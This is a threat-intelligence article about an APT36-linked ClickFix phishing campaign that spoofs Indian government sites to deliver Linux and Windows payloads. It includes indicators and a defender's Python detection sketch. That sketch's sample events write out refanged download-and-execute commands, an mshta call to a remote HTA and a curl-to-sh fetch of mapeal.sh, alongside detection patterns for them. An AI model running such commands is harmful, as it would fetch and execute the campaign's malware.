
Hunt.io, a threat hunting platform, has revealed a sophisticated phishing campaign using ClickFix-style tactics and spoofed Indian government branding to lure victims on both Windows and Linux platforms. The attack infrastructure, closely mimicking India’s Ministry of Defence, points to a possible return of APT36, the Pakistan-aligned threat group also known as Transparent Tribe.
“Threat actors continue to adopt recognizable branding and official imagery to lower suspicion and facilitate malware execution,” the report notes.
The campaign is centered around a cloned Ministry of Defence portal hosted at email.gov.in.drdosurvey[.]info. The replica page mimics the legitimate press release section of the ministry, but contains only one clickable link—March 2025—designed to trigger the infection chain.
Upon clicking the March 2025 link, users are redirected to different payloads depending on their OS:
- Linux users land on /captcha/linux.php
- Windows users are taken to /captcha/windows.php
The Linux variant displays a simplistic CAPTCHA screen with a blue button labeled “I’m not a rebot”—a spelling anomaly possibly designed to evade automated scanners.
Clicking the button copies a shell command to the clipboard that downloads and executes mapeal.sh from a suspicious domain:
https://trade4wealth[.]in/admin/assets/js/
The script’s only observed action was to fetch and display a JPEG image, suggesting the payload may still be in development or part of a multi-stage infection.
On Windows, users are shown a “For Official Use Only” overlay with a blurred background of India’s AYUSH Ministry site. Clicking “Continue” silently copies a malicious mshta.exe command to the clipboard:

This launches a remote script, which redirects to a heavily obfuscated HTA file (sysinte.hta). Dynamic analysis revealed a .NET-based loader that establishes contact with 185.117.90[.]212—also linked to the spoofed domain email.gov.in.avtzyu[.]store.
The malware executes in the background while showing a decoy document—an actual press release—adding to the illusion of legitimacy.
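As an added illustration from the defender's side (this is not code from the Hunt.io report), the following Python sketch flags the two ClickFix execution patterns described above in process-creation telemetry: mshta.exe invoked with a remote URL, and a fetched shell script piped straight into a shell, plus substring matches on the infrastructure indicators the report names. The event records are constructed for the example, not real logs.

```python
import re
from typing import List

# Indicators named in the report, kept defanged as published.
REPORT_IOCS = (
    "email.gov.in.drdosurvey[.]info",
    "trade4wealth[.]in",
    "185.117.90[.]212",
    "email.gov.in.avtzyu[.]store",
)

# Windows branch: mshta.exe handed a remote http(s) URL on its command line.
MSHTA_REMOTE = re.compile(r"\bmshta(?:\.exe)?\b[^\n]*https?://", re.IGNORECASE)
# Linux branch: curl/wget output piped directly into a shell interpreter.
CURL_PIPE_SH = re.compile(r"\b(?:curl|wget)\b[^|;\n]*\|\s*(?:ba|z|da)?sh\b", re.IGNORECASE)


def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".")


def classify(cmdline: str) -> List[str]:
    """Return the detection labels that apply to one process command line."""
    hits = []
    if MSHTA_REMOTE.search(cmdline):
        hits.append("mshta-remote-hta")
    if CURL_PIPE_SH.search(cmdline):
        hits.append("curl-pipe-shell")
    lowered = cmdline.lower()
    for ioc in REPORT_IOCS:
        if refang(ioc) in lowered:
            hits.append(f"ioc:{ioc}")
    return hits


# Constructed process-creation records; the last two are benign controls.
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": "mshta.exe https://email.gov.in.avtzyu.store/sysinte.hta"},
    {"host": "lx02", "cmdline": "bash -c 'curl -fsSL https://trade4wealth.in/admin/assets/js/mapeal.sh | sh'"},
    {"host": "ws01", "cmdline": "mshta.exe C:\\Program Files\\Vendor\\setup.hta"},
    {"host": "lx02", "cmdline": "curl -fsSL https://deb.debian.org/debian/dists/stable/Release"},
]


def triage(events) -> list:
    """Keep only events that trip at least one label, with the labels attached."""
    return [(e["host"], e["cmdline"], h) for e in events if (h := classify(e["cmdline"]))]
```

The local-file mshta launch and the plain curl download are deliberately left unflagged, since either alone is common in legitimate administration.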
The report suggests medium confidence attribution to APT36 (Transparent Tribe) based on the following factors:
- Reuse of government-themed lures
- Clipboard-based ClickFix execution
- HTA and .NET-based delivery mechanisms
- Focus on Indian government and defense personnel
“While attribution remains unconfirmed, the tradecraft observed… is consistent with historic activity attributed to APT36,” the report concludes.